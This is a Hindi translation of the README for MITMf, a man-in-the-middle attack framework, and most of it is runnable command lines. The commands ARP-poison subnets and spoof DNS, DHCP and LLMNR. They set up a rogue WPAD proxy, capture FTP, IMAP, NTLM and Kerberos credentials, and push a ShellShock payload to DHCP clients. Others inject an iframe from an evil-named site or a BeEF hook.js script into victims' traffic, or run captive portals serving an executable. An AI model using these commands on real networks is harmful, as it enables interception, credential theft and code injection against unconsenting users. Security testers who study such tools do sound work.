मैन-इन-द-मिडल हमलों के लिए फ्रेमवर्क
मैन-इन-द-मिडल हमलों के लिए फ्रेमवर्क
यह प्रोजेक्ट अब अपडेट नहीं किया जा रहा है। MITMf को उस समय मैन-इन-द-मिडल हमलों को अंजाम देने के लिए एक आधुनिक उपकरण की आवश्यकता को पूरा करने के लिए लिखा गया था। तब से इस क्षेत्र को भरने के लिए कई अन्य उपकरण बनाए गए हैं, आपको शायद Bettercap का उपयोग करना चाहिए क्योंकि यह अधिक सुविधा संपन्न और बेहतर रखरखाव वाला है।
त्वरित ट्यूटोरियल, उदाहरण और डेवलपर अपडेट: https://byt3bl33d3r.github.io
यह उपकरण sergio-proxy पर आधारित है और यह प्रोजेक्ट को पुनर्जीवित और अपडेट करने का एक प्रयास है।
मुझसे संपर्क करें:
समस्याएँ सबमिट करने से पहले, कृपया विकी में प्रासंगिक अनुभाग पढ़ें।
कृपया स्थापना निर्देशों के लिए विकी देखें।
MITMf का उद्देश्य मैन-इन-द-मिडल और नेटवर्क हमलों के लिए एक वन-स्टॉप-शॉप प्रदान करना है, साथ ही मौजूदा हमलों और तकनीकों को अपडेट और बेहतर बनाना है।
मूल रूप से अन्य उपकरणों (जैसे Ettercap, Mallory) की महत्वपूर्ण कमियों को दूर करने के लिए बनाया गया, इसे लगभग शून्य से पूरी तरह से फिर से लिखा गया है ताकि एक मॉड्यूलर और आसानी से विस्तार योग्य फ्रेमवर्क प्रदान किया जा सके जिसका उपयोग कोई भी अपना स्वयं का MITM हमला लागू करने के लिए कर सके।
फ्रेमवर्क में एक अंतर्निहित SMB, HTTP और DNS सर्वर है जिसे विभिन्न प्लगइन्स द्वारा नियंत्रित और उपयोग किया जा सकता है, इसमें SSLStrip प्रॉक्सी का एक संशोधित संस्करण भी शामिल है जो HTTP संशोधन और आंशिक HSTS बायपास की अनुमति देता है।
संस्करण 0.9.8 के अनुसार, MITMf सक्रिय पैकेट फ़िल्टरिंग और हेरफेर का समर्थन करता है (मूल रूप से etterfilters ने वही किया था, लेकिन बेहतर), जिससे उपयोगकर्ता किसी भी प्रकार के ट्रैफ़िक या प्रोटोकॉल को संशोधित कर सकते हैं।
MITMf चलने के दौरान कॉन्फ़िगरेशन फ़ाइल को ऑन-द-फ्लाई संपादित किया जा सकता है, परिवर्तन फ्रेमवर्क के माध्यम से पारित किए जाएंगे: यह आपको हमले के दौरान प्लगइन्स और सर्वर की सेटिंग्स को ट्वीक करने की अनुमति देता है।
MITMf Net-Creds का उपयोग करके FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (कम्युनिटी स्ट्रिंग्स), NTLMv1/v2 (सभी समर्थित प्रोटोकॉल जैसे HTTP, SMB, LDAP आदि) और Kerberos क्रेडेंशियल्स को कैप्चर करेगा, जो स्टार्टअप पर चलता है।
Responder एकीकरण LLMNR, NBT-NS और MDNS पॉइज़निंग और WPAD रोग सर्वर समर्थन की अनुमति देता है।
अब आप Scapy का उपयोग करके MITMf द्वारा इंटरसेप्ट किए गए किसी भी पैकेट/प्रोटोकॉल को संशोधित कर सकते हैं! (अब और etterfilters नहीं! याय!)
उदाहरण के लिए, यहाँ एक बेवकूफी भरा छोटा फ़िल्टर है जो ICMP पैकेट के गंतव्य IP पते को बदलता है:
if packet.haslayer(ICMP):
log.info('Got an ICMP packet!')
packet.dst = '192.168.1.0'
packet वेरिएबल का उपयोग करेंdata वेरिएबल का उपयोग करेंअब फ़िल्टर का उपयोग करने के लिए हमें बस इतना करना है: python mitmf.py -F ~/filter.py
आप शायद इसे Spoof प्लगइन के साथ संयोजित करना चाहेंगे ताकि वास्तव में किसी और के पैकेट को इंटरसेप्ट किया जा सके ;)
नोट: आप MITMf को पुनरारंभ किए बिना ऑन-द-फ्लाई फ़िल्टर संशोधित कर सकते हैं!
सबसे बुनियादी उपयोग, इंटरफ़ेस enp3s0 पर HTTP प्रॉक्सी SMB, DNS, HTTP सर्वर और Net-Creds शुरू करता है:
python mitmf.py -i enp3s0
Spoof प्लगइन का उपयोग करके गेटवे 192.168.1.1 के साथ पूरे सबनेट को ARP पॉइज़न करें:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1
ऊपर जैसा ही + Responder प्लगइन का उपयोग करके WPAD रोग प्रॉक्सी सर्वर:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad
गेटवे 192.168.1.1 के साथ 192.168.1.16-45 और 192.168.0.1/24 को ARP पॉइज़न करें:
python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1
ARP पॉइज़निंग के दौरान DNS स्पूफिंग सक्षम करें (स्पूफ करने के लिए डोमेन कॉन्फ़िग फ़ाइल से लिए गए हैं):
python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1
LLMNR/NBTNS/MDNS स्पूफिंग सक्षम करें:
python mitmf.py -i enp3s0 --responder --wredir --nbtns
DHCP स्पूफिंग सक्षम करें (IP पूल और सबनेट कॉन्फ़िग फ़ाइल से लिए गए हैं):
python mitmf.py -i enp3s0 --spoof --dhcp
ऊपर जैसा ही ShellShock पेलोड के साथ जो निष्पादित होगा यदि कोई क्लाइंट असुरक्षित है:
python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'
Inject प्लगइन का उपयोग करके HTML IFrame इंजेक्ट करें:
python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com
JS स्क्रिप्ट इंजेक्ट करें:
python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js
एक कैप्टिव पोर्टल शुरू करें जो सब कुछ http://SERVER/PATH पर रीडायरेक्ट करता है:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH
डिफ़ॉल्ट पेज /portal.html (thx responder) और /CaptiveClient.exe (शामिल नहीं) का उपयोग करके http://your-ip/portal.html पर कैप्टिव पोर्टल शुरू करें:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive
ऊपर जैसा ही लेकिन IP के बजाय होस्टनाम captive.portal के साथ (captive.portal को आपके IP पर हल करने की आवश्यकता है, जैसे DNS स्पूफ के माध्यम से):
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns
एक अतिरिक्त SimpleHTTPServer इंस्टेंस के साथ LOCALDIR को http://IP:8080 (पोर्ट mitmf.config में बदलें) पर सर्व करने वाला कैप्टिव पोर्टल शुरू करें:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR
ऊपर जैसा ही लेकिन होस्टनाम के साथ:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns
और भी बहुत कुछ!
बेशक आप लगभग किसी भी प्लगइन को एक साथ मिला सकते हैं (जैसे ARP स्पूफ + inject + Responder आदि)
सभी उपलब्ध विकल्पों की पूरी सूची के लिए, बस python mitmf.py --help चलाएँ।